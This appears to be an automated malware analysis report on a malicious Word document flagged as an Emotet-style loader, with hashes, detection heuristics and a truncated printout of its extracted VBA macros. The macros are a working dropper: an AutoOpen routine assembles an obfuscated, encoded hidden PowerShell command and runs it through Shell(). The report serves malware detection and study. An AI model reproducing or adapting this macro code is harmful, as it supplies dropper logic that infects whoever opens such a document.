Office (OLE) malware analysis — malicious · bfa2aa6f4dea6a70

MALICIOUS

Office (OLE)

123.2 KB Created: 2018-05-29 07:29:00 Authoring application: Microsoft Office Word First seen: 2018-11-05

MD5: 280e1291d8056e1c0040c65ca1b03857 SHA-1: 7154a210a6be137af4f6070d24481542bedc5fad SHA-256: bfa2aa6f4dea6a70037ce6d024d864506553875df9e7b0edaa2d2fd0d39815a8

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros with an AutoOpen function that calls Shell() to execute a command. The reconstructed PowerShell command 'powershell -WindowStyle hidden -e IAAoACgAKA AiAHsANAA4AH0Ae wA4ADk AfQB7ADEAMQAz AH0AewAx ADA M gB9A HsAMQA3ADA AfQB7ADYAMg B9AHsAMQA0AD QAfQB7ADUANQB 9AHsANw A 0AH0Aew A3ADAAf QB7AD EAMwAyAH0Ae wA4ADQAfQ' is heavily obfuscated but indicates the execution of a second-stage payload. This is a common technique for malware droppers.

Heuristics 7

ClamAV: Doc.Malware.Emodldr-10058963-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Emodldr-10058963-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18233 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18233 bytes
SHA-256: `acf85da548b57f47835891def38972049a2ecc93c8d6d8e2f6c92df89056a14f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "zmCwwUNSHaR" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function HViLoznHlL() On Error Resume Next UuwoVh = Fix(49546 / CSng(7016) * MPMpXl * hUpBV) VhBn = CDate(45561) VbXfza = Fix(76182 / CSng(98153) * oduVi * ipriDa) VhBn = CDate(68859) HViLoznHlL = JmzONRniPzR + znQzmlIw + fUUGDW + IrSiG + RVIaCHzc + ohlDk + EFXCXbow + ConRhaGfbk + SKSJXIwUWi + JwwBUOipG + BTjGMG + LvXnYORVT cXhwh = Fix(46829 / CSng(5213) * JwPcMz * ZcKNE) VhBn = CDate(45057) End Function Sub Autoopen() On Error Resume Next cQrFq = Fix(99884 / CSng(18807) * TElFuH * cFaHO) VhBn = CDate(39199) CKCRZ (HViLoznHlL) GBPjnR = Fix(11876 / CSng(86777) * iwRvR * ciCRW) VhBn = CDate(55150) End Sub Function CKCRZ(AirCZ) On Error Resume Next rGDvH = Fix(1199 / CSng(9373) * zJqdJp * JMsjar) VhBn = CDate(12817) MbswORluVR = jUSFTw + Shell(zIPimZsjXG + Chr(vbKeyP) + bziRicn + AirCZ, vbHide) cLAUd = Fix(85371 / CSng(9427) * zVvKId * JFoahp) VhBn = CDate(51252) End Function Attribute VB_Name = "HRlYpYqCT" Function JmzONRniPzR() On Error Resume Next bsFjBP = Fix(34249 / CSng(20857) * TzvSB * QEPwc) VhBn = CDate(13470) ShbZJ = "owersHeLL -WinD" + "owsTyle " + "hidden " + "-e IAAoACgAKA" + "AiAHsANAA4AH0Ae" + "wA4ADk" uTNmU = Fix(66878 / CSng(18418) * MSUKE * IbcFu) VhBn = CDate(36763) NcFVoEfuNY = "AfQB7ADEAMQAz" + "AH0AewAxADA" + "AMgB9A" + "HsAMQA3ADA" + "AfQB7ADYAMg" bnNGS = Fix(56891 / CSng(88268) * tzUpP * lWPvjB) VhBn = CDate(19374) aNfSXIK = "B9AHsAMQA0AD" + "QAfQB7ADUANQB" + "9AHsANwA" + "0AH0Aew" + "A3ADAAf" + "QB7AD" + "EAMwAyAH0Ae" + "wA4ADQAfQB" fbHww = Fix(14047 / CSng(57455) * qhnHTj * jBFPHT) VhBn = CDate(39641) VzYsXt = "7ADIANAB9AHsA" + "OQB9AHsAMQA2" + "ADQAfQB7" + "ADcAMw" + "B9AHsAM" + "AB9AHs" JmzONRniPzR = ShbZJ + NcFVoEfuNY + aNfSXIK + VzYsXt End Function Function znQzmlIw() On Error Resume Next VpMXEM = Fix(20165 / CSng(22801) * uUIlw * imcGG) VhBn = CDate(75710) Ejndh = "AMwAxAH" + "0AewA" + "xADIANg" + "B9AHsAN" + "wA3AH0Aew" + "AxADI" + "AMQB9AHsAMg" IiEWj = Fix(87032 / CSng(57383) * CnKcmH * jZajVW) VhBn = CDate(23603) GlBiSuRkYQL = "A4AH0Ae" + "wAxADQAMwB9AH" + "sAOAA4AH0AewA" + "xADAANAB9AHsAO" + "QAzAH0AewA" + "xADQAMQ" + "B9AHs" + "AMQA3ADQ" + "AfQB7ADEAMQA" YNhjad = Fix(59088 / CSng(23809) * MTjiS * dRijsj) VhBn = CDate(95371) ZszTocXWZi = "yAH0A" + "ewAxADMANA" + "B9AHsAO" + "AA1AH0" + "AewAx" LOsCD = Fix(62830 / CSng(50855) * fwfjI * NDIXb) VhBn = CDate(93690) ihUqBD = "ADcAfQB7ADEA" + "MAA3A" + "H0AewA4A" + "DEAfQB7ADMA" + "OAB9AHsAOAB9AHs" + "AMwAzAH0AewA" + "xADYANwB9AH" TaDRq = Fix(93207 / CSng(29180) * pTRaEW * haafn) VhBn = CDate(88958) lhjrTX = "sANgA1" + "AH0AewA0" + "ADMAfQB7ADE" + "AMAAxA" + "H0AewAxADcAMwB9" + "AHsAMQAxADA" + "AfQB7ADEANAA" + "5AH0Ae" + "wAxADAAOAB" + "9AHsAMQA0" kDlZbE = Fix(58809 / CSng(45651) * FAtsn * lNkLip) VhBn = CDate(54554) bDTHvd = "AH0AewAxADIA" + "MwB9AHsAMQ" + "A2ADI" + "AfQB7ADEAM" + "QAxAH0AewA5ADYA" + "fQB7ADMAOQB" + "9AHsAMQA2" FEfuV = Fix(65659 / CSng(94033) * JVfqAf * UKISw) VhBn = CDate(23599) YjMTHCjnCD = "ADAAfQB7ADEAN" + "AA2AH0AewAzAH" + "0AewAxADQA" + "MgB9AH" + "sAOAA" KditpN = Fix(91356 / CSng(53955) * zIpjV * JIpXKr) VhBn = CDate(45848) DQLGS = "yAH0AewAyAD" + "YAfQB7ADMANgB" + "9AHsANgAzAH0Aew" + "AxADE" + "AOQB9" + "AHsAMQAyADQ" + "AfQB7ADEANQA1AH" znFwP = Fix(630 / CSng(41587) * dBfuB * ctjAh) VhBn = CDate(11600) AwsUAN = "0AewA1ADQAfQB7" + "ADEAMwA4AH0A" + "ewA0ADEAfQ" + "B7ADUAMg" + "B9AHsAMQA2ADYAf" + "QB7AD" + "MANAB9AHsA" + "NQAzAH" + "0AewAxADMANw" hLzvYB = Fix(99775 / CSng(54724) * CimRjF * QfbuZi) VhBn = CDate(78108) qczLZlBSZi = "B9AHsAMQA1" + "AH0AewA5ADc" + "AfQB7ADE" + "ANgAzA" + "H0AewAx" + "ADQAMAB9AHsA" + "MwA3AH0AewA1A" + "DYAfQB7ADEAMg" + "A4AH0A" + "ewA2ADQAfQB" znQzmlIw = Ejndh + GlBiSuRkYQL + ZszTocXWZi + ihUqBD + lhjrTX + bDTHvd + YjMTHCjnCD + DQLGS + AwsU ... (truncated)

SHA-256: acf85da548b57f47835891def38972049a2ecc93c8d6d8e2f6c92df89056a14f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "zmCwwUNSHaR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function HViLoznHlL()
On Error Resume Next
UuwoVh = Fix(49546 / CSng(7016) * MPMpXl * hUpBV)
VhBn = CDate(45561)
VbXfza = Fix(76182 / CSng(98153) * oduVi * ipriDa)
VhBn = CDate(68859)
HViLoznHlL = JmzONRniPzR + znQzmlIw + fUUGDW + IrSiG + RVIaCHzc + ohlDk + EFXCXbow + ConRhaGfbk + SKSJXIwUWi + JwwBUOipG + BTjGMG + LvXnYORVT
cXhwh = Fix(46829 / CSng(5213) * JwPcMz * ZcKNE)
VhBn = CDate(45057)
End Function
Sub Autoopen()
On Error Resume Next
cQrFq = Fix(99884 / CSng(18807) * TElFuH * cFaHO)
VhBn = CDate(39199)
CKCRZ (HViLoznHlL)
GBPjnR = Fix(11876 / CSng(86777) * iwRvR * ciCRW)
VhBn = CDate(55150)
End Sub
Function CKCRZ(AirCZ)
On Error Resume Next
rGDvH = Fix(1199 / CSng(9373) * zJqdJp * JMsjar)
VhBn = CDate(12817)
MbswORluVR = jUSFTw + Shell(zIPimZsjXG + Chr(vbKeyP) + bziRicn + AirCZ, vbHide)
cLAUd = Fix(85371 / CSng(9427) * zVvKId * JFoahp)
VhBn = CDate(51252)
End Function


Attribute VB_Name = "HRlYpYqCT"
Function JmzONRniPzR()
On Error Resume Next
bsFjBP = Fix(34249 / CSng(20857) * TzvSB * QEPwc)
VhBn = CDate(13470)
ShbZJ = "owersHeLL -WinD" + "owsTyle " + "hidden " + "-e IAAoACgAKA" + "AiAHsANAA4AH0Ae" + "wA4ADk"
uTNmU = Fix(66878 / CSng(18418) * MSUKE * IbcFu)
VhBn = CDate(36763)
NcFVoEfuNY = "AfQB7ADEAMQAz" + "AH0AewAxADA" + "AMgB9A" + "HsAMQA3ADA" + "AfQB7ADYAMg"
bnNGS = Fix(56891 / CSng(88268) * tzUpP * lWPvjB)
VhBn = CDate(19374)
aNfSXIK = "B9AHsAMQA0AD" + "QAfQB7ADUANQB" + "9AHsANwA" + "0AH0Aew" + "A3ADAAf" + "QB7AD" + "EAMwAyAH0Ae" + "wA4ADQAfQB"
fbHww = Fix(14047 / CSng(57455) * qhnHTj * jBFPHT)
VhBn = CDate(39641)
VzYsXt = "7ADIANAB9AHsA" + "OQB9AHsAMQA2" + "ADQAfQB7" + "ADcAMw" + "B9AHsAM" + "AB9AHs"
JmzONRniPzR = ShbZJ + NcFVoEfuNY + aNfSXIK + VzYsXt
End Function
Function znQzmlIw()
On Error Resume Next
VpMXEM = Fix(20165 / CSng(22801) * uUIlw * imcGG)
VhBn = CDate(75710)
Ejndh = "AMwAxAH" + "0AewA" + "xADIANg" + "B9AHsAN" + "wA3AH0Aew" + "AxADI" + "AMQB9AHsAMg"
IiEWj = Fix(87032 / CSng(57383) * CnKcmH * jZajVW)
VhBn = CDate(23603)
GlBiSuRkYQL = "A4AH0Ae" + "wAxADQAMwB9AH" + "sAOAA4AH0AewA" + "xADAANAB9AHsAO" + "QAzAH0AewA" + "xADQAMQ" + "B9AHs" + "AMQA3ADQ" + "AfQB7ADEAMQA"
YNhjad = Fix(59088 / CSng(23809) * MTjiS * dRijsj)
VhBn = CDate(95371)
ZszTocXWZi = "yAH0A" + "ewAxADMANA" + "B9AHsAO" + "AA1AH0" + "AewAx"
LOsCD = Fix(62830 / CSng(50855) * fwfjI * NDIXb)
VhBn = CDate(93690)
ihUqBD = "ADcAfQB7ADEA" + "MAA3A" + "H0AewA4A" + "DEAfQB7ADMA" + "OAB9AHsAOAB9AHs" + "AMwAzAH0AewA" + "xADYANwB9AH"
TaDRq = Fix(93207 / CSng(29180) * pTRaEW * haafn)
VhBn = CDate(88958)
lhjrTX = "sANgA1" + "AH0AewA0" + "ADMAfQB7ADE" + "AMAAxA" + "H0AewAxADcAMwB9" + "AHsAMQAxADA" + "AfQB7ADEANAA" + "5AH0Ae" + "wAxADAAOAB" + "9AHsAMQA0"
kDlZbE = Fix(58809 / CSng(45651) * FAtsn * lNkLip)
VhBn = CDate(54554)
bDTHvd = "AH0AewAxADIA" + "MwB9AHsAMQ" + "A2ADI" + "AfQB7ADEAM" + "QAxAH0AewA5ADYA" + "fQB7ADMAOQB" + "9AHsAMQA2"
FEfuV = Fix(65659 / CSng(94033) * JVfqAf * UKISw)
VhBn = CDate(23599)
YjMTHCjnCD = "ADAAfQB7ADEAN" + "AA2AH0AewAzAH" + "0AewAxADQA" + "MgB9AH" + "sAOAA"
KditpN = Fix(91356 / CSng(53955) * zIpjV * JIpXKr)
VhBn = CDate(45848)
DQLGS = "yAH0AewAyAD" + "YAfQB7ADMANgB" + "9AHsANgAzAH0Aew" + "AxADE" + "AOQB9" + "AHsAMQAyADQ" + "AfQB7ADEANQA1AH"
znFwP = Fix(630 / CSng(41587) * dBfuB * ctjAh)
VhBn = CDate(11600)
AwsUAN = "0AewA1ADQAfQB7" + "ADEAMwA4AH0A" + "ewA0ADEAfQ" + "B7ADUAMg" + "B9AHsAMQA2ADYAf" + "QB7AD" + "MANAB9AHsA" + "NQAzAH" + "0AewAxADMANw"
hLzvYB = Fix(99775 / CSng(54724) * CimRjF * QfbuZi)
VhBn = CDate(78108)
qczLZlBSZi = "B9AHsAMQA1" + "AH0AewA5ADc" + "AfQB7ADE" + "ANgAzA" + "H0AewAx" + "ADQAMAB9AHsA" + "MwA3AH0AewA1A" + "DYAfQB7ADEAMg" + "A4AH0A" + "ewA2ADQAfQB"
znQzmlIw = Ejndh + GlBiSuRkYQL + ZszTocXWZi + ihUqBD + lhjrTX + bDTHvd + YjMTHCjnCD + DQLGS + AwsU
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.